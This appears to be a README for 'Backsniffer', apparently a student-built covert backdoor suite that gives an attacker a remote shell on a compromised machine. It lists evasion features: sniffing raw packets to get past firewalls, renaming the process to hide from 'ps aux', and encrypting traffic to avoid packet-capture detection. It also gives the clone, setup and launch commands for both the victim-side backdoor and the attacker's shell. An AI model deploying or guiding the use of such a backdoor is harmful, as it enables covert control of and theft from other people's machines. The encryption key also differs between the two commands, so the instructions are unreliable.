Backsniffer is a covert communication suite that allows communication between an attacker & a backdoor application.
Backsniffer is a covert communication suite that allows communication between an attacker and a backdoor application on a target’s compromised machine.
Backsniffer contains two modules:
1. Blackhat.py – This is the module that sends commands to the target and waits for replies.
2. Client.py – The actual “Back-Door” that can be run on the client machine.
Some features of the Backsniffer suite include:
• Firewall Evasion: Commands are able to get through to the target machine even with a running firewall due to the use of raw-sockets to sniff for packets.
• Process Masking: The back-door module running on the client’s machine can camouflage itself by changing the name of it’s process. This allows it to remain invisible through usual detection methods such as running ‘ps aux’.
• Authentication: By checking for a pre-determined TTL and destination port, there are two layers of authentication to ensure that the backdoor only picks up messages that are meant for it.
• AES 256 Bit Encryption: All messages sent between the client and backdoor are encrypted using AES 256 bit encryption to mitigate any chance of easy discovery via packet captures.
1. Backsniffer requires that the following python libraries be installed
2. This can all be installed by running the shell script:
a. git clone https://github.com/tratnayake/8505A3-Backsniffer
b. cd 8505A3-Backsniffer
c. chmod +x startup.sh
Sending & Receiving Data
1. Starting the backdoor.
On the target machine, enter command: python client.py 80 71 012345689abcdef abcdefghijklmnop [Kickyou2:0]
The first two arguments that we are listening for packets that have the characteristics: (1) incoming to port 80 and (2) have a TTL of 71. This is the criteria to specify that the packets are from the attacker.
Secondly, we then enter in our pre-shared encryption key and initialization vectors. These two parameters allows us to decrypt and encrypt the messages between attacker and victim.
2. Starting the attacker’s shell.
On the attackers machine, enter command: python blackhat.py 192.168.1.3(your victim) 500 80 71 0123456789abcdef abcdefghijklmnop
After the connection info has been entered, the attacker can simply begin entering in commands as if he or she were utilizing a shell on the victims machine.